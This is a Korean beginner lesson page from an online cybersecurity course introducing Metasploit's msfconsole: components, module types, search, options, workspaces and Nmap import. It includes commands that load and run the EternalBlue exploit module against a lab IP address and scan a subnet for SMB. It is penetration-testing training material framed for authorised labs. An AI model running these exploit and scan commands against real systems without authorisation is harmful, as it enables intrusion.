Metasploit 아키텍처와 msfconsole
msfconsole을 탐색하고 익스플로잇·페이로드·모듈 구조를 이해하며 옵션을 구성합니다.
Metasploit 아키텍처와 msfconsole은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 1번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
Metasploit이란 무엇입니까?
Metasploit Framework는 익스플로잇을 개발하고 테스트하고 실행하기 위한 통합 인터페이스를 제공하는 오픈 소스 침투 테스트 플랫폼입니다. 승인된 실습 환경에서 익스플로잇을 수행할 때 사용하는 업계 표준 도구입니다.
Metasploit 구성 요소
주요 구성 요소는 다음과 같습니다. msfconsole(대화형 CLI), msfvenom(페이로드 생성기), Metasploit DB(호스트와 세션을 저장하는 PostgreSQL), Armitage(GUI 프런트엔드)입니다.
msfconsole 시작하기
msfconsole을 실행하고 데이터베이스를 초기화합니다. 프롬프트가 msf6 >로 변경됩니다. 모든 명령, 모듈 이름 및 옵션에서 탭 자동 완성을 사용할 수 있습니다.
# Start msfconsole
msfconsole
# Initialize database (if needed)
msfdb init
msfdb start
# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.모듈 유형
Metasploit은 기능을 다음 모듈 유형으로 구성합니다. 익스플로잇(취약점별 공격 코드), 페이로드(익스플로잇 후 실행되는 코드), 보조(스캐너 및 퍼저), 사후(익스플로잇 후 작업), 인코더, nop입니다.
msf6 > show exploits # list exploit modules
msf6 > show auxiliary # list auxiliary modules
msf6 > show payloads # list payloads
msf6 > show post # post-exploitation modules모듈 검색
search 명령은 이름, CVE, 플랫폼 또는 등급으로 모듈을 필터링합니다. 모듈 등급은 신뢰성을 나타냅니다. 매우 우수함 > 우수함 > 좋음 > 보통 > 평균 > 낮음 순입니다.
msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17익스플로잇 모듈 사용
use로 모듈을 선택하고, show options로 필요한 옵션을 확인하고, set으로 값을 설정한 다음, run 또는 exploit으로 실행합니다.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run전역 옵션 설정
setg는 이후에 사용하는 모든 모듈에 옵션을 전역으로 설정합니다. 참여 기간 내내 값이 변하지 않는 LHOST, LPORT 및 RHOSTS에 유용합니다.
msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444
# Unset global
msf6 > unsetg LHOST보조 모듈
보조 모듈은 페이로드를 전달하지 않고 검색, 열거 및 퍼징을 수행합니다. 예로 SMB 버전 스캐너, SSH 로그인 무차별 대입 도구, HTTP 디렉터리 스캐너가 있습니다.
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run작업 공간 관리
작업 공간은 평가별로 검색 데이터와 세션을 정리합니다. 데이터를 분리해 유지하려면 각 평가를 시작할 때 새 작업 공간을 만듭니다.
msf6 > workspace # list workspaces
msf6 > workspace -a lab_test # create
msf6 > workspace lab_test # switch
msf6 > hosts # show discovered hosts
msf6 > services # show discovered servicesNmap 통합
Nmap XML 검색 결과를 Metasploit의 데이터베이스로 직접 가져와 호스트 및 서비스 표를 채울 수 있으며, 이를 통해 대상에 맞는 모듈을 선택할 수 있습니다.
msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445도움말 및 문서
모든 모듈에는 기본 제공 문서가 있습니다. info를 사용하면 모듈 설명, 신뢰성 등급, 참조 자료(CVE 및 권고문), 필요한 옵션을 확인할 수 있습니다.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
# Shows: description, CVE references,
# platform, architecture, reliability rank빠른 확인
msfconsole에서 모듈을 선택하는 명령은 무엇입니까?
요약: Metasploit 아키텍처
msfconsole은 중앙 허브입니다. 모듈을 검색하고, 옵션을 설정하고, 익스플로잇을 실행하고, 세션을 관리합니다. 항상 이름이 지정된 작업 공간 안에서 작업하고, Nmap 결과를 가져와 데이터베이스를 채우며, 실행하기 전에 모듈 정보를 읽으십시오. 무엇을 실행하는지, 그리고 그 이유가 무엇인지 이해해야 합니다.
AI 튜터와 함께 Cyber Security Academy을(를) 배우세요 — 무료
브라우저에서 실제 코드를 작성하고 실행하며, 24/7 AI 튜터로부터 즉각적인 도움을 받고, 웹이나 앱에서 중단한 부분부터 계속 학습하세요.
- 코스
- 76
- 레슨
- 303
자주 묻는 질문
“Metasploit 아키텍처와 msfconsole” 강의는 무료인가요?
네 — “Metasploit 아키텍처와 msfconsole” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
“Metasploit 아키텍처와 msfconsole”에서 뭘 배우나요?
msfconsole을 탐색하고 익스플로잇·페이로드·모듈 구조를 이해하며 옵션을 구성합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 1번째 강의입니다.
“Metasploit 아키텍처와 msfconsole” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.
이 강의의 모든 강의
- Metasploit 아키텍처와 msfconsole
- 알려진 취약점 악용
- 페이로드: 스테이징과 비스테이징, Meterpreter
- 사후 익스플로잇: 피벗과 지속성